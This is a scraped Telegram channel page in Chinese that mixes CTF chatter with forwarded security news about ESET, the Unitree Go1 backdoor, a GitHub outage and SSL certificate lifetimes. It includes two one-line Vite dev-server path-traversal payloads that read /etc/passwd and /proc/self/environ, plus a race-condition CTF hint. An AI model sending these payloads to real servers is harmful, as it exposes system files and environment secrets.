Puddin在TG上看到了啥 – Telegram
Puddin在TG上看到了啥
779 subscribers
1.64K photos
66 videos
86 files
2.38K links
会把想要收藏的东西堆在这里
#日常 #数码 #科技 #渗透 #碎碎念
Download Telegram
在打TGCTF(
有点累了
🥱1
This media is not supported in your browser
VIEW IN TELEGRAM
真累了,出去玩去了,以后再也不单刷了
🥰2
This media is not supported in your browser
VIEW IN TELEGRAM
然后我又回来了,学弟在旁边打瓦,我在打CTF
wordpress那题 拿到密码十分钟,网络加载半小时,到底是谁在扫
🤡3
Forwarded from 蓝点网订阅频道 (山外的鸭子哥)
#安全资讯 杀毒软件 ESET 的病毒扫描程序存在安全漏洞被黑客利用拿来部署恶意软件,完全诠释什么叫做灯下黑。

借助漏洞黑客将恶意软件放在与 ESET 扫描程序相同的目录里并迫使扫描程序启动恶意软件,从而绕过标准的安全检测流程。

查看全文:https://ourl.co/108737

→欢迎关注:蓝点网订阅频道
→欢迎关注:蓝点网X/Twitter
→联系编辑:山外的鸭子哥
web除0解题之外AK,那很满足了
🤩5
This media is not supported in your browser
VIEW IN TELEGRAM
Puddin在TG上看到了啥
vite还在发力 CVE-2025-31125(CVE-2025-30208的Bypass)
vite还在在发力

/@fs/etc/passwd?.noscript?.wasm?init


CVE-2025-31486
Puddin在TG上看到了啥
vite还在在发力 /@fs/etc/passwd?.noscript?.wasm?init CVE-2025-31486
vite还在在在发力

/@fs/app#/../proc/self/environ


CVE-2025-32395

需要猜vite项目所在地址,可以从403的返回界面看到(
Forwarded from bupt.moe
#security
宇树Go1机器狗固件里默认安装了隧道服务,同时没有做出恰当的限制导致有API Key(在固件里)就可以访问狗,同时SSH服务默认打开并且是弱密码。

编者评论:如果是故意的,那我无话可说;如果不是故意的,那我只能说宇树开发团队毫无安全意识,这方面的水平真的堪忧。
https://cyberinsider.com/remote-access-backdoor-discovered-in-chinese-robot-dog-unitree-go1/
Forwarded from 科技圈🎗在花频道📮
GitHub目前已屏蔽中国大陆访问

有登录状态的可以正常访问,其他情况返回403。

Itdog

📮投稿 ☘️频道 🌸聊天
github 403未登陆中国大陆IP用户

大概是主动屏蔽?
切了https重新测,这下全都是403了
Forwarded from 科技圈🎗在花频道📮
GitHub目前已恢复中国大陆访问

更新:Github称无法在中国大陆访问是由于意外
Due to a configuration change with unintended impact, users that were not logged in who tried to visit GitHub.com from China were temporarily unable to access the site. For users already logged in, they could continue to access the site successfully. Impact started 2025/04/12 at 20:01 UTC. Impact was mitigated 2025/04/13 at 14:55 UTC.

The configuration changes that caused this impact have been reversed and users should no longer see problems when trying to access GitHub.com.

Itdog
GitHub Status

📮投稿 ☘️频道 🌸聊天
Forwarded from 每日消费电子观察 (玉米狐狸 | 啊米玉说的道理)
一年SSL证书将逐渐成为历史,CA/B论坛SC-081v3提案几乎全票通过

从26年开始,可签发的SSL/TLS证书的最长时间将分三年从原来的398天逐步缩减到47天

意味着你不得不去实现自动部署,长有效期证书的时代即将终结


https://groups.google.com/a/groups.cabforum.org/g/servercert-wg/c/9768xgUUfhQ
https://forum.naixi.net/thread-3496-1-1.html
https://github.com/cabforum/servercert/pull/553
看门狗(确信)
请找出图中的漏洞,绕过safe = blackJack(name)

解:

图中的safe = blackJack(name)是赋值而不是创建变量

所以可以用条件竞争,让 ... safe := os.Open(...夹在safe = blackJack(name)safe != nil 中间执行,把本来不为nil的safe变量强行变为nil

这就是新生赛的含金量吗
🤯4